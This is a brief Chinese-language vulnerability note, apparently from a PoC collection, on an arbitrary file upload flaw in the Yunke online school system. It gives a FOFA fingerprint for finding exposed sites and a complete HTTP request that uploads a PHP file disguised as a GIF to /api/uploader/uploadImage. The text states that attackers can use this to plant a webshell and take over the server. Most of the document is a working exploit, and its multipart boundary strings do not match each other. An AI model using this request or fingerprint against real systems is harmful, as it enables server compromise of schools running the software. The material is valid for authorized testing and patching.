# 云课网校系统文件上传漏洞(DVB-2024-6594)

云课网校系统是一款基于ThinkPhP框架的网校系统，包含直播，点播，考试，问答，论坛，文章等模块，是一款最具性价比的线上学习系统。该系统存在任意文件上传漏洞，攻击者可以直接上传webshell文件获取服务器权限

## fofa

```yaml
"/static/libs/common/jquery.stickyNavbar.min.js"
```

## poc

```yaml
POST /api/uploader/uploadImage HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
x-requested-with: XMLHttpRequest

------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="1G3311040N.php"
Content-Type: image/gif

<?php phpinfo();?>
------WebKitFormBoundaryLZbmKeasWgo2gPtU--
```

![image.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407190040362.png)